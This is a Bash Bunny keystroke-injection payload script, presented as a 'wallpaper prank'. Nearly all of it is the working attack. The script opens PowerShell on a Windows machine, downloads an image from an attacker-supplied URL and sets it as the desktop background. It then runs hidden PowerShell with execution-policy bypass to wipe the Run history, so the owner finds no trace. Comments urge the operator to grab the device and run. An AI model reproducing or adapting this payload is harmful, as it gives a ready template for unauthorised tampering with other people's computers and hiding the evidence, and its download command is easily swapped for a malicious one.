wallpaper-prank

# __          __   _ _ _____                        _____                 _    
# \ \        / /  | | |  __ \                      |  __ \               | |   
#  \ \  /\  / /_ _| | | |__) |_ _ _ __   ___ _ __  | |__) | __ __ _ _ __ | | __
#   \ \/  \/ / _` | | |  ___/ _` | '_ \ / _ \ '__| |  ___/ '__/ _` | '_ \| |/ /
#    \  /\  / (_| | | | |  | (_| | |_) |  __/ |    | |   | | | (_| | | | |   < 
#     \/  \/ \__,_|_|_|_|   \__,_| .__/ \___|_|    |_|   |_|  \__,_|_| |_|_|\_\
#                                | |                                           
#                                |_|                                           

# Name: Wallpaper prank without any traces :chhhht:
# Author : jcardonne | www.jcardonne.com
# Repository : https://github.com/jcardonne/Bashbunny-payloads/blob/master/wallpaper-prank

# Instruction:
# For the script to work correctly, simply replace [URL] with your domain name and
# [PIC.jpg] with the name of the image and the name of its extension

# LED :
# Red - Attack phase
# Blue - Erasing traces of your passage - like a ninja !
# Green - It's done, you can take the key and run away !

# I'm not responsible for what you do with this script! (At your peril) #

ATTACKMODE HID
LED R
Q GUI r
Q DELAY 600
Q STRING "powershell"
Q ENTER
Q DELAY 2000
Q STRING "iwr -Uri [URL]/[PIC.jpg] -OutFile 'c:\windows\temp\[PIC.jpg]'; Set-ItemProperty -path 'HKCU:\Control Panel\Desktop\' -name wallpaper -value 'c:\windows\temp\[PIC.jpg]' ; 1..20|%{RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters ,1 ,True;sleep 1}; exit"
Q ENTER
Q DELAY 200
Q GUI DOWNARROW

LED B 500
QUACK GUI r
QUACK DELAY 1000
QUACK STRING powershell -WindowStyle Hidden -Exec Bypass "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
QUACK ENTER
LED G